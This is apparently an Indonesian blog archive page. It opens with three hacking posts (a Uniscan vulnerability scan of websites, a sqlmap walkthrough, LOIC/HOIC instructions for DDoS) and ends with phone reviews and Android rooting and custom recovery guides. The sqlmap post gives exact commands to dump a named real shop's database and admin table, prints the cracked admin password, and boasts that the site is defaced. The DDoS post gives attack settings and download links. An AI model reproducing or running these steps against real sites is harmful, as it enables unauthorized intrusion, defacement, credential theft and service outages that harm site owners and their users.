Uniscan Di Backtrack Untuk Mencari Bugs Di Website

hari ini aku akan menunjukkan kepada Anda bagaimana cara scan kerentanan dalam sebuah situs web menggunakan BackTrack - Uniscan, atau semua situs di server. Sebelum nya saya meminta maaf kepada semua kawan karena saya sendiri tidak pandai dalam hal BackTrack atau Linux. Saya hanya pengguna bajakan yaitu Windows

Dalam tutorial ini saya akan menggunakan sebuah program di BackTrack yaitu Uniscan. sangat mudah digunakan. Pertama-tama, buka terminal dan ketik perintah ini:

cd /pentest/web/uniscan && ./uniscan.pl


Nanti akan mencul Sesuatu seperti gambar di atas pada terminal Anda. Sekarang yang harus kita lakukan adalah mengikuti petunjuk.

Pertama-tama kita perlu target untuk di scan, saya sudah memilih satu target. Untuk mulai scan, pertama Anda harus memeriksa opsi yang ingin Anda gunakan untuk anda di scan.

#CARA PENGGUNAAN:
Periksa option di samping Anda, dan memasukkannya setelah URL seperti ini:

./uniscan.pl -u You are not allowed to view links. Register or Login to view. -b -q -d -w

atau secara bersamaan kode nya di padukan semua. seperti di bawah ini

./uniscan.pl -u You are not allowed to view links. Register or Login to view. -bqdw

Sekarang scan akan di mulai, dan terminal akan terlihat seperti ini:


Scan ini akan mencari celah kerentanan seperti SQL-i/LFI/RFI dan sebagainya. Dan juga mencari untuk Webshells, backdoors, PHP info disclosure, Email, dan banyak lagi.

Berikut adalah beberapa contoh: PHP info() disclosure:


External Links/Hosts:


Source Code disclosure:


Dynamic Scan, Vulnerability Identification:


Program ini juga bisa mendapatkan semua situs di server, dan kemudian Anda akan dapat menyecan semua web yang ada di satu server. Untuk melakukan nya anda hanya menjalankan perintah ini:
./uniscan.pl -i "ip:127.0.0.1"

Ubah 127.0.0.1 ke IP server target Anda. Semua situs akan disimpan di "sites.txt" di direktori yang sama.

Sekarang untuk menyecan situs-situs dalam folder tadi, jalankan perintah ini:
./uniscan.pl -f sites.txt -bqwd

Anda dapat mengubah pilihan apa saja yang Anda inginkan. Semoga Bermanfaat kawan,

Read More

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

• Python | Available on Backtrack
• Sqlmap | Available on Backtrack

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

• cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

• python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

• python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

• python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

• python sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

• do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Read More

DDOS Dengan Dual HOIC LOIC

DDOS Dengan Tools Anonymous .....!!!!

-=LOIC=-

Download  = http://sourceforge.net/projects/loic/


-taip link website, klik LOCK ON
-IP tinggal kosong xpe
-untick 'wait for reply' (tak payah tick)
-thread 1000
-Method : HTTP
-IMMA CHARGIN MAH LAZER

-=HOIC=-

Download = http://www.mediafire.com/?5su5vuj90cirm4p
-klik +
-taip link website
-set power
-add booster
-naikkan thread
-FIRE TEH LAZER !
Saya sudah coba bersam dengan 100 orang ternyata memang bisa....
Salam Barnando 

Read More

Review Cross A7s

Review Cross A7s mungkin sudah ditunggu-tunggu pembaca Gadgetmoo.com. Apa pasal? Smartphone ini adalah produk lokal (baca: china) yang laku keras di pasaran. Disamping itu, Gadgetmoo.com juga sudah beberapa kali memberikan tips dan trik tentang hape ini.
Dibandingkan harga yang ditawarkan, spek yang ditawarkan A7S sangat menarik, tapi apakah benar-benar OK? Mari kita lihat apakah Cross A7s ini cuma menang di tampilan atau isinya juga ciamik.

Cross A7S menawarkan 3 pilihan warna, antara lain, Full White, Full Black, dan Half Black Yellow. Body  A7S ini cukup oke, bentuknya bagus, dan hape ini cukup antep, tidak seperti hape cina yang biasanya ringan kayak hape mainan. Bentuknya hampir mirip Galaxy S3, jadi bagi yang mencari leather casenya, bisa digunakan model dompet milik S3, dengan hanya menukar cangkangnya dengan milik A7S.

Di bagian atas Cross A7S ini terdapat lubang micro USB dan Jack 3.5. Di sebelah kanan, kita bisa menemukan tombol untuk Pengaturan Volume dan Power (On/Off). Chromynya hanya sperti List tipis, cukup cerdik.
Tombol sentuh yang berada dibawah Menu, Home, dan Back, sangat responsif , LEDnya pun juga enak dimata, dan kebetulan buildnya juga bagus.
Layar 4.5″  A7S ini sudah menggunakan teknologi IPS, dengan rasio qHD 960*540 resolusi 240, jadi cukup tajam dan mempunyai kerapatan yang cukup detail, warna yang ditampilkan pun baik.

Dibagian atas layar,  ada speaker, kamera, light sensor dan proximity sensor. Light sensornya berfungsi dengan baik, begitu juga proximity sensornya. Kamera depan, sangat cukup bila digunakan untuk 3G call.
Di belakang kita bisa temukan kamera utama dengan resolusi 8MP, speaker, dan Flash Led, serta Logo dari Cross. Di dalamnya ada 4 slot:  2 untuk simcard (GSM-GSM) MicroSD, dan Battery. Battery A7S menggunakan daya 1.600mAh , cukup lah, tapi sebenarnya lebih baik lagi  2.000 mAh.

Modul Camera tidak terlalu menonjo, namun hasilnya sangat bagus. Salah satu kelebihan dari A7S ini, hasil macronya masih diatas S3 dan Iphone4S,  namun LEDnya tidak seterang 2 hape branded pembanding tadi.
Android bawaan A7S ini menggunakan versi ICS, 4.03 namun sudah ada versi JellyBean-nya.
Untuk menjalankan Game HD, – kami ambilkan keterangan dari halaman FansPagenya- banyak game HD yang dapat dimainkan dengan baik di A7S ini, Wild Blood, NFS Most Wanted, Modern COmbat 4, Amazing Spiderman, dan masih banyak lagi. Untuk memutar video HDpun, A7s ini tidak mengalami kendala.
Kesimpulan Review Cross A7s ini, dengan harga yang ditawarkan, Cross A7S ini melampaui speknya. Berikut benchmarking dari Antutu:

Read More

Custom ROM Cross A7s Galaxy S4

 

Custom ROM Cross A7s Galaxy S4: Tutorial Instalasi

Custom rom cross a7s yang akan saya bahas kali ini adalah ROM Samsung Galaxy SIV. Kesimpulan sementara ROM ini hanya menyebabkan satu problem yaitu tidak adanya icon charging ketika charging baterai, tapi kami rasa itu bukan masalah, toh baterai tetap bisa terisi. Note :  Instal CWM Root sebelum memulai “oprekisasi”  ni penampakannya haha

berikut ini

Keistimewaan custom rom cross a7s Samsung Galaxy S4 ini:
-init.d support sudah diaktifkan dari kernel, jadi kita tinggal meletakkan script tweak nya di init.d
-Tweak ram,sdcard,dan sebagainya semua ada di folder init.d
-Penambahan fitur di menu setting
-Update widget transparent
-update lockscreen text life companion
-Perbaikan bug efek kebiruan saat mau screenshot video
-Perbaikan app yg kehidden di drawer yg di install di sdcard
-gps fast lock, syaratnya buka gps nya pertama kali di ruangan terbuka, sekitar 10 detik.
Cara install:
1. Download ROM-nya disini atau Link Mirror disini
2. Pindahkan file hasil download ke SDCard (letakkan di root direktori/ tanpa folder)
3. Masuk Ke CWM Recovery, bagaimana caranya? Matikan ponsel kemudian setelah mati, tekan tombol “power + volume up” secara bersamaan, sampai masuk halaman Recovery.
4. Pada CWM Recovery pilih “Wipe data/factory reset” delete all
5. kembali ke halaman awal, dan pilih lagi “wipe cache partition” delete all,
6. Kembali ke halaman awal lagi, pilih “install zip from sdcard” lalu “choose zip from sdcard” dan pilih file hasil download tadi (sgs4.zip)
7. Install…. dan tunggu sampai instalasi rampung,
8. Reboot and done!

Read More

Cara Root Cross A7s

 

Cara Root Cross A7s menggunakan Framaroot

Cara root cross A7s mungkin topik yang sangat ditunggu-tunggu pembaca Gadgetmoo.com karena ada hubungannya dengan tulisan ini. Kenapa install Custom ROM A7S diperlukan rooting? Ya karena kita perlu root akses aka super user untuk bisa menginstal ROM di Android.
Kali ini tutorial cara root cross A7S ini sangat mudah, bahkan mungkin yang baru kenal dunia oprek Android bisa dengan pedenya berkata: apa susahnya rooting?

Kenapa mudah? Karena root cross A7s kali ini menggunakan sebuah software, yaitu Framaroot. Tentu saja sebelum memulai, silahkan download Framaroot disini, atau kalau ingin mendapatkan versi terbaru dan terupdate, silhkan main kesini.
Jadi gimana caranya? Sabar, Anda cuma harus melototin 3 gambar ini, lalu praktekkan OK?

Sudah? kalau sudah semua tinggal reboot and…. done!

 

Read More

Instal CWM cross A7S

Instal CWM cross A7S 

Nah, apa itu CWM? CWM adalah sebutan umum untuk ClockworkMod Recovery, yaitu tool recovery sekunder untuk perangkat Android yang dibuat oleh Koush, seorang anggota XDA Developer Forum. CWM dikembangkan dari tool recovery standar Eclair. Selain CWM, ClockworkMod Recovery juga sering disebut sebagai clockwork dan CW recovery.

Fungsi CWM paling utama adalah Android backup dan Restore. Gunanya untuk membackup sistem ponsel, internal memori dan termasuk seluruh partisi dan menyimpannya ke dalam sdcard. Hasil backup berupa folder dengan nama sesuai tgl-bln-thn-jam saat melakukan backup. Tool ini sangat membantu buat Anda yang suka gonta-ganti firmware yg berbeda dan ketika ingin kembali ke ROM semula, tinggal lakukan restore menggunakan CWM tanpa harus flash ulang dan instal banyak aplikasi lagi.
Menarik bukan? Nah untuk kali ini akan kita bahas install CWM di smartphone Cross A7s

1. Download CWM  disini : CWM_v.6
2. Download Mobileuncle MTK Tools, yang bisa Anda download gratis di Play Store
3. File CWM berupa .7zip ekstrak dulu kemudian pindahkan ke root folder SD card
4. Jalankan “Mobileuncle MTK Tools” yang terinstal otomatis dari PlayStore tadi, kemudian klik Recover Update Mode pada pilihan aplikasi mobileuncle, dan pilih recovery.img yang tadi di download klik oke.
5. Setelah itu pilih reboot to recovery dan bingo! Anda telah berhasil memasuki halaman Recovery.

Read More

Cara Install CWM dan TWRP Recovery Tanpa Komputer

y, ya kali ini Saya akan membahas tentang cara install CWM dan TWRP Recovery Tanpa Komputer. Karena dengan terterbatasan waktu dan ruang mungkin tidak sedikit dari mereka yang kesulitan menggunakan komputer untuk melakukan install Custom Recovery seperti CWM dan TWRP Recovery di perangkat Android mereka. Mungkin salah satu dari mereka adalah kalian sekarang yang sedang membaca artikel Android Gila ini. Bagaimana? Jika kalian memang benar-benar ingin memasang CWM dan TWRP Recovery tanpa komputer ataupun laptop lanjutkan membacanya.
Silahkan kalian baca artikel ini dengan baik karena setiap sebelum melakukan proses install Android Gila memberikan beberapa tips yang mungkin agar ponsel Android kalian dapat melakukan proses install dengan lancar.

Cara Install CWM dan TWRP Recovery Tanpa Komputer

Langkah 1 - Download dan install aplikasi ROM Manager (free) atau ROM Manager (Premium) jika kalian mau upgrade menggunakan lisensi premium.
Langkah 2 - Selanjutnya pilih pada bagian Recovery Setup, install or update recovery, pilih Custom Recovery yang ingin kalian install. Pilih antara ClockworkMod Recovery atau Team Win Recovery Project (TWRP).
Langkah 3 - Setelah memilih Custom Recovery pilihan kalian, konfirmasi Phone Model punya kalian. Jika tidak ada pilihan phone model untuk perangkat Android kalian sebaiknya jangan teruskan cara ini.
Langkah 4 - Pilih versi Custom Recovery yang akan kalian install, lalu download jika sudah. Pilih reboot to recovery untuk mengetahui CWM atau TWRP Recovery sudah ter-install dengan baik atau belum

Read More